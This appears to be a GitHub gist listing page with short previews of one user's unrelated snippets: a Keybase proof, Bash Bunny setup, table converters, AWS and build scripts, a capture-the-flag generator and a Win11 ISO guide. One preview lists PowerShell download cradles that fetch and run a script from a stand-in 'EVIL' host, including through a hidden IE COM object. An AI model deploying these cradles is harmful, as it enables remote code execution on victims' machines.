I hereby claim:
- I am tkisason on github.
- I am kisasondi (https://keybase.io/kisasondi) on keybase.
- I have a public key whose fingerprint is 77FC A831 5CE3 4BCF B1C0 1B0C F1D9 B3A2 00C6 8442
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
Custom languages don't work without bbpayloads: Fetch the bashbunny payloads:
git clone https://github.com/hak5/bashbunny-payloads.git
Slide the switch to arming position (all the way to the usb plug)
move contents of payloads/library/DuckyInstall to the payloads/switch1 directory in the bunny
| def convert(intext): | |
| intext = intext.split('\n') | |
| text = '{| class="wikitable"' +'\n' | |
| line = intext[0].replace(' | ', ' !! ').replace('| ','! ') | |
| text += line + '\n' | |
| intext.pop(0) | |
| for row in intext: | |
| text += '|-' + '\n' | |
| row = row.replace(' | ',' || ').replace('**','') | |
| text += row[:-1] + '\n' |
| # normal download cradle | |
| IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1") | |
| # PowerShell 3.0+ | |
| IEX (iwr 'http://EVIL/evil.ps1') | |
| # hidden IE com object | |
| $ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r | |
| # Msxml2.XMLHTTP COM object |
| import json | |
| import boto3 | |
| from botocore.exceptions import ClientError | |
| ec2 = boto3.client('ec2') | |
| security_group_id = "sg-..." ## add your security group ID here! | |
| #0. Find your security group name from your EC2 instance and copy/paste your security group id above ^^^ | |
| # Create a new lambda function, name it whatever, runtime: python 3.7 | |
| # Select the Execution role : Create new role with basic Lambda permissions | |
| # Pick the "Enable Function URL" option from Advanced settings. |
| #!/usr/bin/env python3 | |
| import os | |
| import sys | |
| from ruamel.yaml import YAML | |
| def getRulefilesFromPath(path): | |
| rulefiles = [] | |
| for root, dirs, files in os.walk(path): | |
| dirs[:] = [d for d in dirs if not d.startswith(".")] |
| #!/usr/bin/env python3 | |
| import string | |
| import random | |
| import os | |
| import shutil | |
| import glob | |
| challengeText = """Here is a carefully prepared file. You must find the flag within!""" |
| #!/bin/bash | |
| set -ex | |
| apt update | |
| apt install -y libssl-dev libssl1.1 python3-pip build-essential git \ | |
| pkg-config autoconf autoconf-archive libglib2.0-dev \ | |
| libjsoncpp-dev uuid-dev liblz4-dev libcap-ng-dev \ | |
| libxml2-utils python3-minimal python3-dbus \ | |
| python3-docutils python3-jinja2 libxml2-utils \ | |
| libtinyxml2-dev policykit-1 libsystemd-dev \ |
This is a short guide on how to build a Win11 Pro ISO image on a linux vm and a macos machine running apple silicon. Such an ISO file can be used to install Win11 Pro on an Apple Silicon (m1 / m2) macbook under vmware. Yes, there are binaries, scripts and tools for this, but this guide only requires some linux tools and a plain macos machine without homebrew and without running some shady binaries downloaded from the Internet.
Download the Win11 product catalog in CAB from from: https://go.microsoft.com/fwlink?linkid=2156292
Unarchive the cab file, extract the products.xml file